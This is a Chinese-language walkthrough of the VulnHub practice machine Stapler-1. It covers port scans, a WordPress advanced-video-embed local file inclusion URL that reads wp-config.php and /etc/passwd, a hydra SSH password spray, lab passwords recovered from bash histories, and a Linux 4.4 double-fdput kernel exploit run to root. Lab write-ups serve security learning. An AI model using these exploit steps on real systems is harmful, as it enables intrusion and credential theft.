靶机地址:Stapler-1 ~ VulnHub
难易程度:3.0 / 10.0文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢!
摘要:端口扫描后,分别在21、22、80等端口获得了一些提示及用户名信息,再访问12380端口,通过nikto扫描到一些目录,其中/blogblog是一个wordpress框架,前往wp-content目录下查看相关插件,其中
advanced-video-embed
存在文件包含漏洞,读取到/etc/passwd
文件和wp-config.php
的mysql信息,获取到一些用户名和密码信息后,使用hydra跑出账号密码信息,获取到低权限。之后可以通过系统漏洞进行提权或者根据提示找到peter的密码,登录进peter用户直接sudo。待完善地方:相关文件的处理命令|cut awk等、编写bash脚本语言自动化执行指定命令
主机探测&端口扫描
靶机ip为:192.168.1.10
端口扫描结果:
hh@Kali2020:~$ sudo nmap -sS -T5 -p- --open 192.168.1.10
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 11:46 CST
Nmap scan report for red.initech (192.168.1.10)
Host is up (0.00019s latency).
Not shown: 65523 filtered ports, 4 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
12380/tcp open unknown
MAC Address: 00:0C:29:77:E0:EA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 54.08 seconds
信息搜集
80端口
没有信息,去其他端口搜集信息
22端口
没密码,但是的到用户名 Barry
12380端口
- 这里显示unknown,重新进行详细地扫描
hhh@Kali2020:~$ sudo nmap -A -p 12380 -sV -sS 192.168.1.10
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 13:23 CST
Nmap scan report for red.initech (192.168.1.10)
Host is up (0.00023s latency).
PORT STATE SERVICE VERSION
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
MAC Address: 00:0C:29:77:E0:EA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.23 ms red.initech (192.168.1.10)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.16 seconds
显示是Apache httpd 2.4.18 ((Ubuntu))
,浏览器访问成功
- 使用nikto扫描,得到信息该网站使用SSL,三个目录
hhh@Kali2020:~$ nikto -h 192.168.1.10:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.10
+ Target Hostname: 192.168.1.10
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2021-02-03 13:02:03 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.1.10' does not match certificate's names: Red.Initech
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2021-02-03 13:04:00 (GMT8) (117 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- 访问三个目录
https://192.168.1.10:12380/admin112233
有提示信息:
This could of been a BeEF-XSS hook ;)
https://192.168.1.10:12380/blogblog
是一个博客
https://192.168.1.10:12380/phpmyadmin
登录界面
- 从/blogblog目录入手,使用dirb进行扫描,是一个wordpress框架
hhh@Kali2020:~$ dirb https://192.168.1.10:12380/blogblog
---- Scanning URL: https://192.168.1.10:12380/blogblog/ ----
+ https://192.168.1.10:12380/blogblog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-admin/
==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-content/
==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-includes/
权限获取
途径一:Plugin漏洞
- 先进目录下查看插件列表,点进去每个插件,有个readme.md文件,可以看到版本信息
https://192.168.1.10:12380/blogblog/wp-content/plugins/
- 对于
advanced-video-embed
插件,google其漏洞
WordPress Plugin Advanced Video 1.0 - Local File Inclusion
是一个本地文件包含漏洞,根据其提示信息进行操作 - 访问wp-config配置文件
https://192.168.1.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
访问后会在当前页面显示一个URL,点击去有一个.jpeg文件,将其下载下来,就可以看到wp-config.php文件信息
wget --no-check-certificate https://192.168.1.10:12380/blogblog/wp-content/uploads/974197914.jpeg
--no-check-certificate:表示不检查证书,针对https的网站文件
可以看到该数据库的root密码信息 root : plbkac
hhh@Kali2020:~$ cat 974197914.jpeg
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
- 访问
/etc/passwd
文件,类似上一步的操作,可以查看到文件内容
https://192.168.1.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd
passwd
部分文件内容
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
- 将
/etc/passwd
有用信息整合下来
cut指令Linux cut命令
cat 1097971703.jpeg | grep /bin/bash | cut -d ":" -f1 > user.txt
-d:自定义分隔符,这里以 : 冒号为分隔符
-f1:指定显示哪第一块区域
- 用hydra跑处账号密码信息
hydra 192.168.1.10 ssh -L user.txt -p plbkac
成功跑出zoe和plbkac的用户密码信息
- 登录ssh
ssh zoe@192.168.1.10
权限提升
方法一:切换到peter用户
遍历/home目录下各个文件,发现peter文件夹不太一样
zoe@red:/home$ ls -alhR
peter文件夹信息:
./peter:
total 72K
drwxr-xr-x 3 peter peter 4.0K Jun 3 2016 .
drwxr-xr-x 32 root root 4.0K Jun 4 2016 ..
-rw------- 1 peter peter 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 peter peter 220 Jun 3 2016 .bash_logout
-rw-r--r-- 1 peter peter 3.7K Jun 3 2016 .bashrc
drwx------ 2 peter peter 4.0K Jun 6 2016 .cache
-rw-r--r-- 1 peter peter 675 Jun 3 2016 .profile
-rw-r--r-- 1 peter peter 0 Jun 3 2016 .sudo_as_admin_successful
-rw------- 1 peter peter 577 Jun 3 2016 .viminfo
-rw-rw-r-- 1 peter peter 39K Jun 3 2016 .zcompdump
ls: cannot open directory './peter/.cache': Permission denied
根据提示信息接下来尝试登录进peter用户
在检查到各个用户的.bash_history
文件,使用bash语言,先将该目录下的所有文件名写入数组内,再去执行下面一行命令,重复30次,每次执行cd pwd cat cd 四个命令,可以看到 JKanode
的.bahs_history 文件内容不同,分析出peter的密码为 JZQuyIN5
zoe@red:/home$ array=(AParnell Drew elly jamie JKanode LSolum mel peter SHAY Taylor CCeaser DSwanger ETollefson JBare JLipps LSolum2 MFrei RNunemaker SHayslett www CJoo Eeth IChadwick jess kai MBassin NATHAN Sam SStroud zoe)
zoe@red:/home$ for i in {0..29}; do cd ./${array[$i]}; pwd; cat .bash_history; cd ../; done
部分信息:
/home/AParnell
exit
/home/Drew
exit
/home/elly
exit
/home/jamie
top
ps aux
exit
/home/JKanode
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
/home/LSolum
exit
登录进peter用户
su peter
sudo cat /root/flag.txt
方法二:通过系统漏洞提权
查看靶机的信息 Ubuntu 16.04|Linux Kernel 4.4.0
root@red:~# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
root@red:~# uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
可以google搜索相关漏洞,也可以使用les.sh工具列举可能的漏洞
这里在exploit-db上搜索了 Linux Kernel 4.4 Ubuntu 16.04
,最后选择了一下的漏洞
inux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
根据其提示,先将文件通过python搭建的简易http服务传递到靶机上(python搭建简易http服务器到靶机的操作在前几台靶机中都有体现)
赋予权限,执行compile.sh文件,再执行./doubleput文件,最后成功提权
zoe@red:~$ ./compile.sh
zoe@red:~$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~# id
uid=0(root) gid=0(root) groups=0(root),1026(zoe)
总结
- SSL
- wordpress-plugin漏洞
- 字符串操作|awk命令|cut命令
- ls -R命令
- 编写bash脚本语言自动化搜索